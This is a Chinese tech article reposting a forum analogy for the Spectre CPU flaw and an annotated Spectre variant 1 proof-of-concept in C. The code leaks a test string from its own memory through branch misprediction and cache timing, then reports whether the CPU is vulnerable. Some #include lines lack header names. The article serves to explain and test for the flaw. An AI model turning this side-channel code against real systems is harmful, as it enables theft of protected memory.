百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术分析 > 正文

通俗理解这次的CPU漏洞,附带修改过带注释源码一份

liebian365 2024-10-22 15:35 25 浏览 0 评论

通俗理解这次的CPU漏洞

文 | 轩辕之风

看雪论坛

技术分析想必大家已经看了不少,我来一个最简单好理解的例子:

生活实例:新生入学报道

(为简化问题,假设今天只有你一个人去学校报道,并且学校工作人员都是250)

开学去学校报道,三个步骤(三条CPU指令):

1)凭借录取通知书去领学号

2)凭借领取到的学号去领寝室号

3)凭借领取到的寝室号去领寝室钥匙

开学了,你捡到一张录取通知书,通知书编号是1001,然后去拿着它去学校报道,报道工作处有三个工作人员甲乙丙。甲负责直接和你交互,甲拿到你的入学通知书后开始查找你的学号,然后填写表格,然后把学号给你。

与此同时,工作人员乙拿到甲查到的学号后,去表格中查你对应的寝室号,等甲办完以后直接交给你。

还是与此同时,工作人员丙拿到乙查到的寝室号后开始去库房的钥匙柜架取出你的钥匙放在办公桌(同时,为了避免等会又跑一趟,它把这栋楼这一层的钥匙盒直接拿到办公室了,等会就不用再去库房奔波了),等乙办完以后就交给你。

但是,这个时候,甲发现你身份有问题,这不是你的录取通知书,不能给你办理入学手续,不能把学号给你。于是你被打回。

可是:乙已经提前帮你把对应学号的寝室号取到了(只是还没给你),丙也已经提前帮你把对应寝室的钥匙给你拿到了(只是还没给你)

好,你被拒绝办理入学了,因为你是假冒的。

实际上,你已经是在校生了,不是大一新生,刚才你是故意去假冒大一新生去报道。

这个时候,你去丙的办公室借钥匙。往常丙都是说你等一下,我去给你拿,然后会等差不多五分钟,丙给你拿来钥匙。但今天不同的是,今天没有等那么久,而是直接就把钥匙取出来了给你,全程不超过10秒钟。

于是,你明白了,一定是我刚才假冒去甲办理入学的时候,丙把钥匙盒取过来的,于是你意识到:我开始捡到的1001号的录取通知书新生住在我们这栋楼这一层。

于是,你如法炮制,伪造1002,1003,1999···号录取通知书去报道,然后知道了他们每个人住在哪一栋那一层。

原文链接:https://bbs.pediy.com/thread-223836.htm

——————————————————————

最近比较火的CPU漏洞解析,附带修改过带注释源码一份

文 | CSZQ

看雪论坛

先说结果,由于CPU乱序执行和分支预测功能,可以通过判断需要读取的页面是否被 cache 缓存来判断内存中存在什么内容。

简单粗暴,直接上本帅改过的代码,含中文注释,不谢。

另外膜拜下这份源码的大神。

/*

modify by:CSZQ

*/

/*

配置

*/

#define __DEBUG 0 // 调试模式开关,会打开额外输出

#define __TRYTIMES 50 // 每个字符尝试读取次数

/*

测试读取的数据

*/

#define __MAGICWORDS

"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"

#define __MAGICWORDSCOUNT (sizeof(__MAGICWORDS) - 1) // 测试数据长度

/*

cache 命中阀值,是一个经验值,不成功9.9可能这里不对,默认值 50 ,可以通过 -t 传参修改

该数值与内存质量、CPU多项参数有关,是一个经验值,下面给出一些基于本帅移动端的 CPU Intel I7-4700MQ 给出的参数取值

取值大致范围:16 - 176

*/

#define CACHE_HIT_THRESHOLD (50)

/*

头文件

*/

#include

#include

#include

#include

#pragma optimize("gt",on)

/*

全局变量

*/

unsigned int array1_size = 16; // 排除 ASCII 码表前 16 个字符

uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 }; // 一个字典

uint8_t array2[256 * 512]; // 256 对应 ASCII 码表

const char *secret = __MAGICWORDS; // 测试读取的数据

int iThreshold = CACHE_HIT_THRESHOLD; // 读取时间阀值

/*

使用 temp 全局变量阻止编译器优化 victim_function()

*/

uint8_t temp = 0;

void victim_function(size_t x) {

/*

x 取值 0 - 15 时 获取 arrary2 的 1 - 16 分组 & temp 后赋值给 temp

temp 一直为 0

发生 evil 分支预测:

array1[x] 在 5 次分支预测时加载的值就是当前需要读取的虚拟地址

array2[array1[x] * 512] 在 5 次分支预测期间读取的是 标准ASCII 0 - 127 * 512 所在地址的 array2 数组内容

其他分支预测:

array1[x] cache 中的是根据尝试次数获取到的正常 array1 数组标准值

array2[array1[x] * 512] 在cache中缓存的是 ASCII 码表 1 - 16 号字符

*/

if (x < array1_size) {

temp &= array2[array1[x] * 512];

}

}

void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {

static int results[256]; // 对应 ASCII 码表

int tries, i, j, k, mix_i;

unsigned int junk = 0;

size_t training_x, x;

register uint64_t time1, time2;

volatile uint8_t *addr;

for (i = 0; i < 256; i++)

results[i] = 0;

/*

每个字符多次尝试获取以增加成功率

*/

for (tries = __TRYTIMES; tries > 0; tries--) {

/*

清空 array2 的每 512 字节首地址 cache

*/

for (i = 0; i < 256; i++)

_mm_clflush(&array2[i * 512]); // _mm_clflush:Invalidate and flush the cache line that contains p from all levels of the cache hierarchy

training_x = tries % array1_size;

/*

训练 CPU 缓存需要的数据

*/

for (j = 29; j >= 0; j--) {

_mm_clflush(&array1_size); // 清空 array1_size 的缓存

/*

100 次内存取值用作延时,确保 cache 页全部换出

*/

for (volatile int z = 0; z < 100; z++) {}

/*

在这一步:

j % 6 = 0 则 x = 0xFFFF0000

j % 6 != 0 则 x = 0x00000000

Avoid jumps in case those tip off the branch predictor

*/

x = ((j % 6) - 1) & ~0xFFFF;

/*

到这里:

j % 6 = 0 则 x = 0xFFFFFFFF

j % 6 != 0 则 x = 0x00000000

*/

x = (x | (x >> 16));

/*

最后:

j % 6 = 0 则 x = malicious_x

j % 6 != 0 则 x = training_x

*/

x = training_x ^ (x & (malicious_x ^ training_x));

/*

调用触发 cache 代码

共计触发 5 次,j = 24、18、12、6、0时,都会触发分支预测

*/

victim_function(x);

}

/*

退出此函数时 cache 中已经缓存了需要越权获取的数据

*/

/*

读取时间。执行顺序轻微混淆防止 stride prediction(某种分支预测方法)

i 取值 0 - 255 对应 ASCII 码表

*/

for (i = 0; i < 256; i++) {

/*

TODO: 贼NB的数学游戏,值得叫 666

167 0xA7 1010 0111

13 0x0D 0000 1101

取值结果为 0 - 255 随机数且不重复

*/

mix_i = ((i * 167) + 13) & 255;

/*

addr 取 arrary2 中 0-255 组的首地址

*/

addr = &array2[mix_i * 512];

/*

junk 保存 TSC_AUX 寄存器值

time1 保存当前时间戳

*/

time1 = __rdtscp(&junk);

/*

获取数据,用以测试时间

*/

junk = *addr;

/*

记录并获取耗时

*/

time2 = __rdtscp(&junk) - time1;

/*

判断是否命中,且 mix_i 不能取 1 - 16,因为 1 - 16 在获取时是无效的

*/

if (time2 <= iThreshold && mix_i != array1[tries % array1_size])

/*

cache arrary2中的 0-255 项命中则 +1 分

*/

results[mix_i]++;

}

/*

获取分组中命中率最高的两个分组,分别存储在 j(最高命中),k(次高命中) 里

*/

j = k = -1;

for (i = 0; i < 256; i++) {

if (j < 0 || results[i] >= results[j]) {

k = j;

j = i;

}

else if (k < 0 || results[i] >= results[k]) {

k = i;

}

}

/*

最高命中项命中次数大于 2 倍加 5 的次高命中项次数

仅仅最高命中项命中 2 次

退出循环,成功找到命中项

*/

if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))

break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */

}

/*

使用 junk 防止优化输出

*/

results[0] ^= junk;

value[0] = (uint8_t)j;//最高命中项

score[0] = results[j];//最高命中项命中次数

value[1] = (uint8_t)k;//次高命中项

score[1] = results[k];//次高命中项命中次数

}

int main(int argc, const char **argv) {

size_t malicious_x = (size_t)(secret - (char*)array1); /* 相对地址 */

int i, score[2], iLen = __MAGICWORDSCOUNT, iCount = 0;

char *opt, *addr;

uint8_t value[2];

printf("Provide by CSZQ\n");

/*

参数解析

*/

if (argc > 1) {

opt = (char*)&argv[1][1];

switch (*opt) {

case 'h':

printf("-h help\n-t 设置阀值,建议取值 16 - 176 之间,默认 50\n");

return 0;

case 't':

if (argc==2) {

sscanf(opt + 1, "%d", &iThreshold);

}

else {

sscanf(argv[2], "%d", &iThreshold);

}

break;

}

}

for (i = 0; i < sizeof(array2); i++)

array2[i] = 1; /* 避免写时复制 */

#if __DEBUG > 0

printf("Reading %d bytes:\n", iLen);

#endif

i = iLen;

while (--i >= 0) {

#if __DEBUG > 0

printf("读取地址:%p ", (void*)malicious_x);

#endif

readMemoryByte(malicious_x++, value, score);

addr = (char*)array1 + malicious_x - 1;

if (value[0] == *addr) {

iCount += (score[0] > 2 * score[1]) ? 1 : 0;

}

#if __DEBUG > 0

/*

如果最高命中项命中次数大于等于 2 倍的次高命中项,认为分支预测成功

*/

printf("%s: ", (score[0] >= 2 * score[1] ? "成功" : "...."));

printf("value:0x%02X char=%c counts=%d ", value[0],

((value[0] > 31 && value[0] < 127) ? (char)value[0] : '?'), score[0]);

if (score[1] > 0)

printf("(可能:value:0x%02X char=%c counts=%d)", value[1], ((value[0] > 31 && value[0] < 127) ? (char)value[0] : '?'), score[1]);

printf("\n");

#endif

}

/*

命中次数超过 1/5 认为存在BUG,过低有可能是巧合或阀值需要调整

*/

printf("%s\r\n", (iCount >= __MAGICWORDSCOUNT / 5) ? "--->存在BUG!!!<---" : "--->不存在BUG<---");

printf("%d 阀值下命中率为:%d / %d\r\n", iThreshold, iCount, iLen);

printf("按任意键退出程序...\r\n");

getchar();

return (0);

}

原文链接:https://bbs.pediy.com/thread-223824.htm

更多详情可参考看雪论坛专题帖: [讨论]Intel 曝出处理器设计漏洞,影响 Linux 和 Windows 内核

相关推荐

“版本末期”了?下周平衡补丁!国服最强5套牌!上分首选

明天,酒馆战棋就将迎来大更新,也聊了很多天战棋相关的内容了,趁此机会,给兄弟们穿插一篇构筑模式的卡组推荐!老规矩,我们先来看10职业胜率。目前10职业胜率排名与一周前基本类似,没有太多的变化。平衡补丁...

VS2017 C++ 程序报错“error C2065:“M_PI”: 未声明的标识符&quot;

首先,程序中头文件的选择,要选择头文件,在文件中是没有对M_PI的定义的。选择:项目——>”XXX属性"——>配置属性——>C/C++——>预处理器——>预处理器定义,...

东营交警实名曝光一批酒驾人员名单 88人受处罚

齐鲁网·闪电新闻5月24日讯酒后驾驶是对自己和他人生命安全极不负责的行为,为守护大家的平安出行路,东营交警一直将酒驾作为重点打击对象。5月23日,东营交警公布最新一批饮酒、醉酒名单。对以下驾驶人醉酒...

Qt界面——搭配QCustomPlot(qt platform)

这是我第一个使用QCustomPlot控件的上位机,通过串口精确的5ms发送一次数据,再将读取的数据绘制到图表中。界面方面,尝试卡片式设计,外加QSS简单的配了个色。QCustomPlot官网:Qt...

大话西游2分享赢取种族坐骑手办!PK趣闻录由你书写

老友相聚,仗剑江湖!《大话西游2》2021全民PK季4月激燃打响,各PK玩法鏖战齐开,零门槛参与热情高涨。PK季期间,不仅各种玩法奖励丰厚,参与PK趣闻录活动,投稿自己在PK季遇到的趣事,还有机会带走...

测试谷歌VS Code AI 编程插件 Gemini Code Assist

用ClaudeSonnet3.7的天气测试编码,让谷歌VSCodeAI编程插件GeminiCodeAssist自动编程。生成的文件在浏览器中的效果如下:(附源代码)VSCode...

顾爷想知道第4.5期 国服便利性到底需优化啥?

前段时间DNF国服推出了名为“阿拉德B计划”的系列改版计划,截至目前我们已经看到了两项实装。不过关于便利性上,国服似乎还有很多路要走。自从顾爷回归DNF以来,几乎每天都在跟我抱怨关于DNF里面各种各样...

掌握Visual Studio项目配置【基础篇】

1.前言VisualStudio是Windows上最常用的C++集成开发环境之一,简称VS。VS功能十分强大,对应的,其配置系统较为复杂。不管是对于初学者还是有一定开发经验的开发者来说,捋清楚VS...

还嫌LED驱动设计套路深?那就来看看这篇文章吧

随着LED在各个领域的不同应用需求,LED驱动电路也在不断进步和发展。本文从LED的特性入手,推导出适合LED的电源驱动类型,再进一步介绍各类LED驱动设计。设计必读:LED四个关键特性特性一:非线...

Visual Studio Community 2022(VS2022)安装图文方法

直接上步骤:1,首先可以下载安装一个VisualStudio安装器,叫做VisualStudioinstaller。这个安装文件很小,很快就安装完成了。2,打开VisualStudioins...

Qt添加MSVC构建套件的方法(qt添加c++11)

前言有些时候,在Windows下因为某些需求需要使用MSVC编译器对程序进行编译,假设我们安装Qt的时候又只是安装了MingW构建套件,那么此时我们该如何给现有的Qt添加一个MSVC构建套件呢?本文以...

Qt为什么站稳c++GUI的top1(qt c)

为什么现在QT越来越成为c++界面编程的第一选择,从事QT编程多年,在这之前做C++界面都是基于MFC。当时为什么会从MFC转到QT?主要原因是MFC开发界面想做得好看一些十分困难,引用第三方基于MF...

qt开发IDE应该选择VS还是qt creator

如果一个公司选择了qt来开发自己的产品,在面临IDE的选择时会出现vs或者qtcreator,选择qt的IDE需要结合产品需求、部署平台、项目定位、程序猿本身和公司战略,因为大的软件产品需要明确IDE...

Qt 5.14.2超详细安装教程,不会来打我

Qt简介Qt(官方发音[kju:t],音同cute)是一个跨平台的C++开库,主要用来开发图形用户界面(GraphicalUserInterface,GUI)程序。Qt是纯C++开...

Cygwin配置与使用(四)——VI字体和颜色的配置

简介:VI的操作模式,基本上VI可以分为三种状态,分别是命令模式(commandmode)、插入模式(Insertmode)和底行模式(lastlinemode),各模式的功能区分如下:1)...

取消回复欢迎 发表评论: